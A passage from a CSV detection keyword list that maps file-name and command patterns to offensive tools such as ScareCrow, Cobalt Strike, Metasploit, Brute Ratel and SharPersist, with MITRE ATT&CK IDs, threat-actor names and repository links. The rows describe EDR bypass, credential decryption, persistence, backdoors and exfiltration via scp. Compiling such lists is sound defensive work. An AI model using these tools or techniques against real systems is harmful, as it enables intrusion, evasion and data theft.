APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow*windows_amd64.exe*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GeorgePatsias/ScareCrow-CobaltStrike","1","1","N/A","10","10","438","68","2022-07-15T09:39:18Z","2021-06-24T10:04:01Z" +"*ScareCrow.go*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow/Cryptor*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow/limelighter*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow/Loader*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow/Utils*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow_*_darwin_amd64*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow_*_linux_amd64*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow_*amd64*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow_checksums.txt*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*SCCM_DLLSiteloading.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*sccmdecryptpoc.*","offensive_tool_keyword","sccmdecryptpoc","SCCM Account Password Decryption POC","T1555.003","TA0006","N/A","N/A","Credential Access","https://gist.github.com/xpn/5f497d2725a041922c427c3aaa3b37d1","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*sccmhunter.db","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","4","344","38","2023-08-25T06:17:23Z","2023-02-20T14:09:42Z" +"*sccmhunter.git*","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","4","344","38","2023-08-25T06:17:23Z","2023-02-20T14:09:42Z" +"*sccmhunter.py*","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","4","344","38","2023-08-25T06:17:23Z","2023-02-20T14:09:42Z" +"*sccmwtf.py*","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","4","344","38","2023-08-25T06:17:23Z","2023-02-20T14:09:42Z" +"*scdivert localhost *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*scheduledtask_utils.py *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*ScheduleRunner.csproj*","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and lateral movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","N/A","3","299","42","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z" +"*ScheduleRunner.exe*","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and lateral movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","N/A","3","299","42","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z" +"*ScheduleRunner.sln*","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and lateral movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","N/A","3","299","42","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z" +"*schlamperei.x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*schshell.cna*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"*schtask_callback*","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" +"*SchTaskBackdoor.*","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1151","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" +"*schtasks /query /v /fo LIST*","greyware_tool_keyword","schtasks","view detailed information about all the scheduled tasks.","T1053.005 - T1082","TA0004 - TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*schtasks_elevator*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*schtasks_exploit *","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*schtasksabuse.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*SchTasksImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*schtquery * full*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*scout aws --profile default -f*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*scout azure --cli*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*scp * *@*:*","greyware_tool_keyword","scp","Detects the use of tools that copy files from or to remote systems","T1041 - T1105 - T1106","TA0002 - TA0008 - TA0010","N/A","N/A","Data Exfiltration","https://attack.mitre.org/techniques/T1105/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*scp *@*:* *","greyware_tool_keyword","scp","Detects the use of tools that copy files from or to remote systems","T1041 - T1105 - T1106","TA0002 - TA0008 - TA0010","N/A","N/A","Data Exfiltration","https://attack.mitre.org/techniques/T1105/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*screen /dev/ttyACM0 115200*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*screen_spy.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*screengrab.exe*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" +"*screenshot_inject *","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*screenspy.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Screetsec*","offensive_tool_keyword","Github Username","github username hosting post exploitation tools","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Screetsec","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*screetsec/Microsploit*","offensive_tool_keyword","BruteSploit","Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . Buffer Overflow","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Microsploit","1","1","N/A","N/A","5","430","133","2017-07-11T16:28:27Z","2017-03-16T05:26:55Z" +"*screetsec/Pateensy*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" +"*screetsec/Sudomy*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1720","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" +"*screetsec/Vegile*","offensive_tool_keyword","Sudomy","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Vegile","1","1","N/A","N/A","7","686","175","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z" +"*--script broadcast-dhcp-discover*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*script/xor-bin.py*","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","2","196","38","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" +"*scripthost_uac_bypass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a 